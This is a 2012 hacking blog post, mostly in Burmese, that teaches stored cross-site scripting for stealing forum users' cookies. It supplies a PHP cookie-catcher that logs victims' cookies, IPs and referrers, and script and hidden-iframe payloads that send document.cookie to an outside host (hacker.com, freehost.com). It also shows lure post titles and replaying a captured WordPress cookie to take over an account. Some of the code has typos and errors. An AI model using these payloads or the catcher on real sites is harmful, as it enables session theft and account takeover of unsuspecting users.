Monday, February 27, 2012

What is Cross-Site-Scripting & Cookie Stealing with Persista

What is XSS?

XSS ဆိုတာ Cross Site Scripting လို႕ေခၚတဲ့ Web Application Vulnerability အမ်ိဳးအစားတစ္ခုပါပဲ.။ Input Filter လုပ္မထားေသာ ေနရာမွတစ္ဆင့္ Code Inject လုပ္၍ Website User မ်ား၏ ID မ်ား Cookies မ်ားကိုခိုးယူႏိုင္သကဲ့သို႕ အျခားနည္းမ်ားျဖင့္ တုိက္ခိုက္ျခင္းကိုဆိုလုိသည္.။

ဘယ္လို Input လုပ္မထားတာလဲဆိုေတာ့ ဒီလိုပါ

Code

<?php
$name=$_GET['name'];
print $name;
?>test.php ပဲဆိုပါစို႕ဗ်ာ ၾကည့္လိုက္ပါ User Input ကုိ Filter လုပ္ထားျခင္းမရွိပါ သို႕ေၾကာင့္ ေအာက္ပါကဲ့သို႕ JavaScript မ်ား Inject လုပ္ႏုိင္သည္

http://127.0.0.1/test.php?name=<script>alert(“XSS”)</script>

ဒီလိုဆို XSS ဆိုျပီး Alert တက္လာပါလိမ့္မယ္…

Two Types of Attacking

1.Persistant XSS
2.Non-Persistant XSS

1.Persistant XSS
stored or second-order vulnerability လို႕လည္းေခၚၾကပါတယ္။ HTML Entities မ်ားကို Encode လုပ္စရာမလိုပဲ User Data မ်ားကို တုိက္ခိုက္ႏုိ္င္ေသာ နည္းတစ္နည္းျဖစ္သည္.။

Let’s Start

Code:

<?php
$name=$_GET['name'];
print $name;
?>

ခုနကလည္းေျပာခဲ့ဖူးတာပါပဲ. User Input ကို Filter လုပ္ထားျခင္းမရွိေသာေၾကာင့္ Javascript မ်ား Inject လုပ္ႏုိင္ပါသည္.။

ပထမဆံုး Vuln ျဖစ္မျဖစ္ရွာရေအာင္..။

ဥပမာ ဖိုရမ္တစ္ခုဆိုပါစို႕ www.vulnforum.com ေပါ့ အဲ့မွာ ဖို၇မ္ခြဲတစ္ခုရွိတယ္ Problem Report ဆိုပါစို႕ အဲ့ဒီ့ဖိုရမ္ခြဲမွာ ကၽြန္ေတာ္ ပထမဆံုး ေပါက္မေပါက္စစစ္ပါမယ္

Subject : XSS Persistant Test
Message : <alert>”XSS”</alert>

ျပီးရင္ Submitted . အဲ့ဒီ့မွာ ကၽြန္ေတာ္တို႕ ျပန္ထြက္လိုက္ပါတယ္ ျပန္၀င္လိုက္ရင္ Pop Up Box နဲ႕ “XSS” လို႕တက္ေနရင္ Inject လုပ္လို႕ရပါျပီ

ဒါဆိုရင္ အျခားေသာ User မ်ားရဲ႕ Cookies မ်ား Steal လုပ္ႏုိင္ရန္ ျပင္ဆင္ရပါမယ္.

Cookie Catcher:

<?php
$cookie = $_GET['c'];
$ip = $_SERVER['REMOTE_ADDR'];
$date=date(“j F, Y, g:i a”);;
$refere$_SERVER['HTTP_REFERER'];
$fp = fopen(‘cookies.html’, ‘a’);
fwrite($fp, ‘Cookie: ‘.$cookie.’
IP: ‘ .$ip. ‘
Date and Time: ‘ .$date. ‘
Website: ‘.$referer.’
‘);
fclose($fp);
header (\”javascript:history.back()\”);
?>
<html></html>

သိပ္ရႈပ္ရႈပ္ရွက္ရွက္ၾကီးမဟုတ္လုိ႕ ကၽြန္ေတာ္ရွင္းမျပေတာ့ပါဘူး ေနာက္မွပဲ Cookies Catcher ေတြနဲ႕ ပက္သက္ျပီး သီးသန္႕ေရးေပးပါ့မယ္.။ Host တစ္ခုမွာ cookies.php ဆိုတာနဲ႕ တင္ပါ့မယ္
ဥပမာ www.freehost.com/cookies.php ေပါ့ Cookies Catcher အတြက္ ျပင္ဆင္လုိ႕ျပီးပါျပီ.။

Let’s Inject

ခုနကေျပာခဲ့တဲ့  Sub Forum ရဲ႕ Subject မွာ လူစိတ္၀င္စားမယ့္ ေခါင္းစဥ္မ်ိဳးတင္ပါ့မယ္ ( ဒါမွ ၀င္ၾကည့္ၾကမွာကိုး  ၀င္မွလည္း Cookies ခိုးလို႕ရမွာကိုး )

Subject : Hey.I found a vuln in this forum
Message : <script>document.location=”http://hacker.com/cookies.php?c=”+document.cookies</script>  ဆိုျပီး ကၽြန္ေတာ္တုိ႕ Java Script ကို Inject လုပ္ပါ့မယ္ ဒါဆို ကၽြန္ေတာ္တုိ႕ Comment ေပးထားတဲ့ေနရာကို အျခား User ၀င္တဲ့အခါမွာ User ရဲ႕ Cookies ဟာ ကၽြန္ေတာ္တို႕ www.freehost.com/cookies.html မွာ သြားျပီး သိမ္းသြားပါတယ္

Cookie:wordpressuser_9314f063e7420cf3cB09db0405006c51=user;
wordpresspass_9314f063e7420cf3cB09db0405006c51=f4370adBcd051f0ecd169424abe8ea;session=s
IP:192.186.0.0
Date and Time:Data & Time
Referer:

ဒီလိုေပါ့ဗ်ာ ဒါဆို ကၽြန္ေတာ္တုိ႕ဟာ

www.vulnforum.com ရဲ႕ Address Bar မွာ

javascript:void(document.cookie=”wordpresspass_9314f063e7420cf3cB09db0405006c51=f4370adBcd051f0ecd169424abe8ea=user”)

လို႕ Inject လုပ္ျပီး Reload လုပ္တဲ့အခါ User ရဲ႕ Control Panel ကိုေရာက္သြားပါျပီ

ေနာက္တစ္မ်ိဳး အဲ့ေနရာမွာပဲ ေနာက္တစ္ထုေပါ့ဗ်ာ

Subject :Hey..I think this forum has vuln
Message : <iframe frameborder=0 height=0 width=0 src=javascript:void(document.location=”www.freehost.com/cookies.php?c=” + document.cookie)</iframe>

Code ကို Inject လုပ္ပါ့မယ္.။ ျပီးရင္ Submit ဆိုပါစို႕.။

အဲ့ဒါကို တျခား User က ျမင္ျပီး Link ကို ၀င္ၾကည့္မိပါလိမ့္မယ္ ဒါေပမယ့္ ေခါင္းစဥ္ကလြဲျပီး ဘာမွမျမင္တာနဲ႕ Comment ေပးလိုက္ပါတယ္ ဒါဆို ခုနကအတုိင္းပဲ Cookies Steal အလုပ္ခံရဦးမွာပဲျဖစ္ျပီး User Control Panel ကိုထိန္းခ်ဳပ္ခံရဦးမွာပဲျဖစ္ပါတယ္ အကယ္၍ User မဟုတ္ဘဲ Admin သာ ျဖစ္ခဲ့ရင္… ;-)

_________________
!....Learn to Be Matured....!


post by  

ROCK FOREVER (MUSIC)

Pageviewers

CBOX

Manutd-Results

Label

Android (3) autorun (3) Backtrack (8) batch file (19) blogger (10) Botnet (2) browser (5) Brute Force (6) cafezee (2) cmd (5) Cookies (2) crack (12) Cracking (2) crypter (7) DDos (20) deepfreeze (4) defacing (1) defence (16) domain (4) Dos (9) downloader (4) ebomb (2) ebook (48) Exploit (26) firewall (3) game (2) gmail (11) google hack (16) Hacking Show (3) Hash (4) hosting (1) icon changer (1) ip adress (6) Keygen (1) keylogger (8) knowledge (67) locker (1) maintainence (8) network (17) news (31) other (35) passwoard viewer (7) password (12) Philosophy (6) Phishing (8) premium account (2) proxy (7) RAT (10) run commands (4) script (27) Shell code (10) shortcut Key (2) SMTP ports (1) social engineering (7) spammer (1) SQL Injection (30) Stealer.crack (5) tools (125) Tools Pack (4) tutorial (107) USB (3) virus (32) website (84) WiFi (4) word list (2)

Blogger templates

picoodle.com

Blogger news

HOW IS MY SITE?

Powered by Blogger.

Blog Archive

Followers

About Me

My Photo
Hacking= intelligent+techonology+psychology
There was an error in this gadget